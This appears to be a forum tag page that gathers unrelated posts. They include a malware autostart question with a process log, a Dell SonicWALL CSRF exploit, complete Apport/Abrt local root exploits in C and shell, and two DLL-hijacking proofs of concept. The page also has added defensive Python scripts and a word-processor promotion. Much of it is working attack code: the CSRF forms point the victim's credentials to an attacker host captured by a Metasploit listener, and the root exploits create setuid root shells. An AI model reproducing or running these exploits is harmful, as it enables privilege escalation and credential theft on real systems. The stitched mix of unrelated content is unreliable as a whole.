Showing results for tags 'create'.
-
The virus on VT: https://www.virustotal.com/en/file/8f35f6f780acccfb406b918db6ef01111dd2c5200a16e97f25d35f76e2532e6d/analysis/1432362743/

The virus injects into many processes, like this: but I can't find how it autostarts. When the OS is restarted, it starts itself via explorer.exe, but I do not know how it gets auto-started.

log:
2015/05/23 15:54:55 c:\windows\explorer.exe Create new process c:\users\test\appdata\roaming\mozilla\firefox\profiles\4ude5xz7.default\storage\permanent\xulstore.exe
Cmd line: "C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\4ude5xz7.default\storage\permanent\xulstore.exe"

Download (Pass: infected) | Source
Tagged with: 2015/05/23, create (and 3 more)
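One way to triage a log like the one in the post above: flag process creations whose image lives in a user-writable AppData path, especially inside a browser profile folder, and note when the parent is explorer.exe, which at logon points at an autostart entry rather than a user action. This is added example code, not from the post; the log lines after the first are constructed, and the format is assumed to be the one the post's single line shows.

```python
import re

# Constructed sample in the format of the post's log line (the first line is that line;
# the other two are made up: a clean launch, and the dropped exe spawning a child).
SAMPLE_LOG = r"""
2015/05/23 15:54:55 c:\windows\explorer.exe Create new process c:\users\test\appdata\roaming\mozilla\firefox\profiles\4ude5xz7.default\storage\permanent\xulstore.exe
2015/05/23 15:55:01 c:\windows\explorer.exe Create new process c:\program files\mozilla firefox\firefox.exe
2015/05/23 15:55:07 c:\users\test\appdata\roaming\mozilla\firefox\profiles\4ude5xz7.default\storage\permanent\xulstore.exe Create new process c:\windows\system32\cmd.exe
""".strip()

# "<date> <time> <parent image> Create new process <child image>"; paths may contain spaces.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (?P<parent>.+?) Create new process (?P<child>.+)$"
)
APPDATA_RE = re.compile(r"\\users\\[^\\]+\\appdata\\(roaming|local|locallow)\\", re.I)
PROFILE_RE = re.compile(r"\\mozilla\\firefox\\profiles\\[^\\]+\\", re.I)


def parse_line(line):
    """Return {'ts', 'parent', 'child'} (paths lower-cased) or None for lines that don't match."""
    m = LINE_RE.match(line.strip())
    return {k: v.lower() for k, v in m.groupdict().items()} if m else None


def classify(ev):
    """List the reasons a process-creation event deserves a look (empty list = nothing notable)."""
    reasons = []
    if ev["child"].endswith(".exe") and APPDATA_RE.search(ev["child"]):
        reasons.append("executable launched from user-writable AppData")
        if PROFILE_RE.search(ev["child"]):
            reasons.append("image lives inside a Firefox profile (a data directory, not a program location)")
        if ev["parent"].endswith("\\explorer.exe"):
            reasons.append("parent is explorer.exe: check logon autostart locations (Run keys, Startup folder, scheduled tasks)")
    if APPDATA_RE.search(ev["parent"]):
        reasons.append("parent itself runs from user-writable AppData")
    return reasons


def scan(log_text):
    """Return [(timestamp, child image, reasons)] for every notable event in the log."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and (reasons := classify(ev)):
            findings.append((ev["ts"], ev["child"], reasons))
    return findings


if __name__ == "__main__":
    for ts, child, reasons in scan(SAMPLE_LOG):
        print(ts, child, "->", "; ".join(reasons))
```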
-
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248

Exploitation Procedure (Outline):

1. Use CSRF to force the currently logged-in user to create a bookmark pointing to an endpoint controlled by the attacker.
2. Use a subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
3. Gather the credentials on the target server provided in step #1.

1. Create a bookmark:

<html>
  <body>
    <form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
      <input type="hidden" name="bmName" value="foo" />
      <input type="hidden" name="host" value="www.malicious-host.tld" />
      <input type="hidden" name="description" value="bar" />
      <input type="hidden" name="tabs" value="Baz" />
      <input type="hidden" name="service" value="HTTP" />
      <input type="hidden" name="fbaSSOEnabled" value="on" />
      <input type="hidden" name="fbaSSOFormUserName" value="user" />
      <input type="hidden" name="fbaSSOFormUserPassword" value="password" />
      <input type="hidden" name="MC_App" value="inherit" />
      <input type="hidden" name="MC_Copy" value="inherit" />
      <input type="hidden" name="MC_Print" value="inherit" />
      <input type="hidden" name="MC_Offline" value="inherit" />
      <input type="hidden" name="name" value="name" />
      <input type="hidden" name="type" value="type" />
      <input type="hidden" name="owner" value="owner" />
      <input type="hidden" name="cmd" value="add" />
      <input type="hidden" name="wantBmData" value="true" />
      <input type="hidden" name="ok" value="OK" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. Call the newly created bookmark. This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.

<html>
  <body>
    <form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
      <input type="hidden" name="HOST" value="www.malicious-host.tld" />
      <input type="hidden" name="bookmarkAccessed" value="4" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3. Set up a listener, e.g. a metasploit payload:

use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"

Source: http://dl.packetstormsecurity.net/1505-exploits/dellsonicwallsra-xsrf.txt
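The fix for a CSRF like the one above is on the server: a state-changing request to the bookmark editor must prove it came from the portal's own page, not from a form hosted elsewhere. Added example (not SonicWALL's code): a check that requires both a same-origin Origin/Referer and a per-session synchronizer token, run against a request shaped like the advisory's forged bookmark-add form. The portal origin, secret, cookie name and session id are placeholders.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

PORTAL_ORIGIN = "https://vpn.example.internal"     # assumed origin of the SRA portal (placeholder)
STATE_CHANGING_CMDS = {"add", "edit", "delete"}    # assumed; the advisory only shows cmd=add


def csrf_token(session_id: str, server_secret: bytes) -> str:
    """Per-session synchronizer token: HMAC(secret, session id), embedded in the portal's own forms."""
    return hmac.new(server_secret, session_id.encode(), hashlib.sha256).hexdigest()


def _header(headers: dict, name: str):
    return next((v for k, v in headers.items() if k.lower() == name.lower()), None)


def check_bookmark_request(headers: dict, form: dict, session_id: str, server_secret: bytes):
    """Return (allowed, reason) for a POST to the bookmark editor.

    Both checks must pass for a state-changing cmd: Origin (or Referer) must be the portal itself,
    and the form must carry this session's synchronizer token (compared in constant time).
    A cross-site form post, like the advisory's, arrives with the attacker page's origin and no token.
    """
    if form.get("cmd") not in STATE_CHANGING_CMDS:
        return True, "not a state-changing command"
    origin = _header(headers, "Origin") or _header(headers, "Referer")
    if not origin:
        return False, "no Origin/Referer on a state-changing request"
    p = urlsplit(origin)
    if f"{p.scheme}://{p.netloc}" != PORTAL_ORIGIN:
        return False, f"cross-origin request from {p.scheme}://{p.netloc}"
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id, server_secret)):
        return False, "missing or invalid synchronizer token"
    return True, "ok"


# Constructed samples: the forged form from the advisory as a browser would submit it from an
# attacker-controlled page (session cookie attached automatically), and a legitimate portal submission.
SECRET = b"server-side-secret"          # placeholder
SESSION = "abc"                          # placeholder session id
FORGED = ({"Origin": "https://attacker.example", "Cookie": f"session={SESSION}"},
          {"cmd": "add", "bmName": "foo", "host": "www.malicious-host.tld",
           "service": "HTTP", "fbaSSOEnabled": "on"})
LEGIT = ({"Origin": PORTAL_ORIGIN, "Cookie": f"session={SESSION}"},
         {"cmd": "add", "bmName": "intranet", "host": "wiki.example.internal",
          "service": "HTTP", "csrf_token": csrf_token(SESSION, SECRET)})

if __name__ == "__main__":
    print("forged:", check_bookmark_request(*FORGED, SESSION, SECRET))
    print("legit: ", check_bookmark_request(*LEGIT, SESSION, SECRET))
```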
-
[CVE-2015-1318,CVE-2015-1862] Apport/Abrt Local Root Exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
#include <linux/sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/auxv.h>
#include <sys/wait.h>

# warning this file must be compiled with -static

//
// Apport/Abrt Vulnerability Demo Exploit.
//
// Apport: CVE-2015-1318
// Abrt: CVE-2015-1862
//
// -- taviso@cmpxchg8b.com, April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To get libc.a,
//      yum install glibc-static or apt-get install libc6-dev
//

int main(int argc, char **argv)
{
    int status;
    Elf32_Phdr *hdr;
    pid_t wrapper;
    pid_t init;
    pid_t subprocess;
    unsigned i;

    // Verify this is a static executable by checking the program headers for a
    // dynamic segment. Originally I thought just checking AT_BASE would work,
    // but that isn't reliable across many kernels.
    hdr = (void *) getauxval(AT_PHDR);

    // If we find any PT_DYNAMIC, then this is probably not a static binary.
    for (i = 0; i < getauxval(AT_PHNUM); i++) {
        if (hdr[i].p_type == PT_DYNAMIC) {
            errx(EXIT_FAILURE, "you *must* compile with -static");
        }
    }

    // If execution reached here, it looks like we're a static executable. If
    // I'm root, then we've convinced the core handler to run us, so create a
    // setuid root executable that can be used outside the chroot.
    if (getuid() == 0) {
        if (chown("sh", 0, 0) != 0)
            exit(EXIT_FAILURE);
        if (chmod("sh", 04755) != 0)
            exit(EXIT_FAILURE);
        return EXIT_SUCCESS;
    }

    // If I'm not root, but euid is 0, then the exploit worked and we can spawn
    // a shell and cleanup.
    if (setuid(0) == 0) {
        system("id");
        system("rm -rf exploit");
        execlp("sh", "sh", NULL);

        // Something went wrong.
        err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
    }

    // It looks like the exploit hasn't run yet, so create a chroot.
    if (mkdir("exploit", 0755) != 0
     || mkdir("exploit/usr", 0755) != 0
     || mkdir("exploit/usr/share", 0755) != 0
     || mkdir("exploit/usr/share/apport", 0755) != 0
     || mkdir("exploit/usr/libexec", 0755) != 0) {
        err(EXIT_FAILURE, "failed to create chroot directory");
    }

    // Create links to the exploit locations we need.
    if (link(*argv, "exploit/sh") != 0
     || link(*argv, "exploit/usr/share/apport/apport") != 0       // Ubuntu
     || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora
        err(EXIT_FAILURE, "failed to create required hard links");
    }

    // Create a subprocess so we don't enter the new namespace.
    if ((wrapper = fork()) == 0) {

        // In the child process, create a new pid and user ns. The pid
        // namespace is only needed on Ubuntu, because they check for %P != %p
        // in their core handler. On Fedora, just a user ns is sufficient.
        if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
            err(EXIT_FAILURE, "failed to create new namespace");

        // Create a process in the new namespace.
        if ((init = fork()) == 0) {

            // Init (pid 1) signal handling is special, so make a subprocess to
            // handle the traps.
            if ((subprocess = fork()) == 0) {

                // Change /proc/self/root, which we can do as we're privileged
                // within the new namespace.
                if (chroot("exploit") != 0) {
                    err(EXIT_FAILURE, "chroot didn't work");
                }

                // Now trap to get the core handler invoked.
                __builtin_trap();

                // Shouldn't happen, unless user is ptracing us or something.
                err(EXIT_FAILURE, "coredump failed, were you ptracing?");
            }

            // If the subprocess exited with an abnormal signal, then everything worked.
            if (waitpid(subprocess, &status, 0) == subprocess)
                return WIFSIGNALED(status) ? EXIT_SUCCESS : EXIT_FAILURE;

            // Something didn't work.
            return EXIT_FAILURE;
        }

        // The new namespace didn't work.
        if (waitpid(init, &status, 0) == init)
            return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
                       ? EXIT_SUCCESS
                       : EXIT_FAILURE;

        // Waitpid failure.
        return EXIT_FAILURE;
    }

    // If the subprocess returned success, the exploit probably worked, reload
    // with euid zero.
    if (waitpid(wrapper, &status, 0) == wrapper) {

        // All done, spawn root shell.
        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
            execl(*argv, "w00t", NULL);
        }
    }

    // Unknown error.
    errx(EXIT_FAILURE, "unexpected result, cannot continue");
}

Apport - Local Linux Root

#!/bin/sh
#
# CVE-2015-1318
#
# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
#
# Example:
#
# % uname -a
# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
#
# % lsb_release -a
# No LSB modules are available.
# Distributor ID: Ubuntu
# Description:    Ubuntu 14.04.2 LTS
# Release:        14.04
# Codename:       trusty
#
# % dpkg -l | grep '^ii  apport ' | awk -F ' ' '{ print $2 " " $3 }'
# apport 2.14.1-0ubuntu3.8
#
# % id
# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)
#
# % ./apport.sh
# pwned-4.3# id
# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)
# pwned-4.3# exit

TEMPDIR=$(mktemp -d)
cd ${TEMPDIR}

cp /bin/busybox .
mkdir -p dev mnt usr/share/apport

( cat << EOF
#!/busybox sh
(
  cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned
  chmod 5755 /mnt/1/root/tmp/pwned
)
EOF
) > usr/share/apport/apport

chmod +x usr/share/apport/apport

( cat << EOF
mount -o bind . .
cd .
mount --rbind /proc mnt
touch dev/null
pivot_root . .
./busybox sleep 500 &
SLEEP=\$!
./busybox sleep 1
./busybox kill -11 \$SLEEP
./busybox sleep 5
EOF
) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \
    lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null

/tmp/pwned -p

rm -Rf ${TEMPDIR}
-
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking
#[+] Date: 28-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Poc: http://i.imgur.com/naHAdJF.png
#[+] Create: Compile the file, then rename it to daemon.dll, then create a .iso file; make sure that
#    the 2 files are in the same dir.

#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DllExport __declspec (dllexport)

int exp(void);        /* prototype: hook_startup() calls exp() before its definition */

/* Exported entry point the PoC relies on being called when the planted DLL is loaded. */
DllExport void hook_startup() { exp(); }

int exp() {
    WinExec("calc", 0);   /* PoC payload: launch calc */
    exit(0);
    return 0;
}

Source
-
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking
#[+] Date: 28-03-2015
#[+] Type: Local Exploits
#[+] Vendor: https://httrack.com/page/2/fr/index.html
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Create: Compile the file, then rename it to dwmapi.dll, then create a .whtt file; make sure that
#    the 2 files are in the same dir.

#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DllExport __declspec (dllexport)

int exp(void);        /* prototype: hook_startup() calls exp() before its definition */

/* Exported entry point the PoC relies on being called when the planted DLL is loaded. */
DllExport void hook_startup() { exp(); }

int exp() {
    WinExec("calc", 0);   /* PoC payload: launch calc */
    exit(0);
    return 0;
}

Source: http://dl.packetstormsecurity.net/1503-exploits/httrackwebsitecopier-dllhijack.txt

Edit: I ask that this post be deleted; originally posted by Aerosol: https://rstforums.com/forum/99633-httrack-website-copier-3-48-21-dll-hijacking.rst
-
Product Description

Liquid Story Binder XE is a uniquely designed word processor for professional and aspiring authors, poets, and novelists. Writing software for those who require the editing ability of a commercial text editor as well as a document tracking system. It is for those who want the freedom to create, outline and revise but are tired of losing track of their work.

Word Processing for Novelists
Liquid Story Binder XE is specifically designed for fiction writing. XE includes all the standard features such as spell-checking, thesaurus, smart quotes, templates, font and paragraph styles — everything you need to write your next great novel.

Chapter and Scene Based Writing
Liquid Story Binder XE can clean and combine many small documents into a single, font-unified manuscript. Use a Chapter Builder to quickly arrange complex scenes.

A Multimedia Organizer
Sort pictures into Galleries or Storyboards, quickly access custom MP3 playlists, even record yourself reading your latest chapter using a microphone.

Pick and Choose Flexible Features
Pick and choose the file types that work best for you. Liquid Story Binder never tells you how to write! Flexible file types allow you to use your imagination. Use a Dossier for characters, places or things, or a Builder to preserve important snippets.

Organize Your Novel
Create a Binder folder and let Liquid Story Binder sort, search and combine your documents.

Create the Perfect Working Environment
Choose a color scheme that suits your writing style. Save window positions and open files for quick and easy access using Workspaces. Open dozens of windows simultaneously – or just a simple textbox centered in the screen.

Full Screen Editing
Even though Liquid Story Binder is packed with features, sometimes less is more. Liquid Story Binder XE offers full screen editing, a feature that removes all distractions including menus and title bars.

A Typewriter for your PC
The Liquid Story Binder Typewriter is the ultimate tool for distraction-free writing. Like a mechanical typewriter, users are prevented from editing previously written text. There are no specific formatting options, no scrolling, deleting, or revisions. The Typewriter tool doesn't even allow you to use the backspace key. It forces you to write, to move forward, to add new words. It halts the temptation to linger, revise, and correct. Turn Liquid Story Binder into a typewriter for your PC.

Advanced Outlining Tools
Timelines, Outlines, Mindmaps, Dossiers, Sequences and Storyboards. Liquid Story Binder XE provides the tools you need to plan your next great novel.

Mindmapping
Liquid Story Binder XE Mindmaps allow you to visually link ideas together using lines and text. A mindmap is a diagram used to represent words, ideas, tasks, or other items linked to and arranged around a central key word or idea. Unlike many mindmapping applications, Liquid Story Binder XE does not use a rigid or pre-designed structure. Users can place items however they choose. Create item colonies, isolated from one another. Index items by color. Change item connections quickly and easily. Try using Mindmaps to create and organize family trees.

Journals
Liquid Story Binder XE allows you to create multiple Journals. Start a daily writing journal, or go back into the past to tell the story of a fictional character. Combine your Journal entries into a single manuscript.

Protect Your Work
For every Chapter, Liquid Story Binder XE creates a single, easy-to-access backup file. This backup file contains an entry for each day's changes. Liquid Story Binder XE also includes a complete Binder backup using ZIP compression.

Product homepage | Download | Deal Expires in: EXPIRED!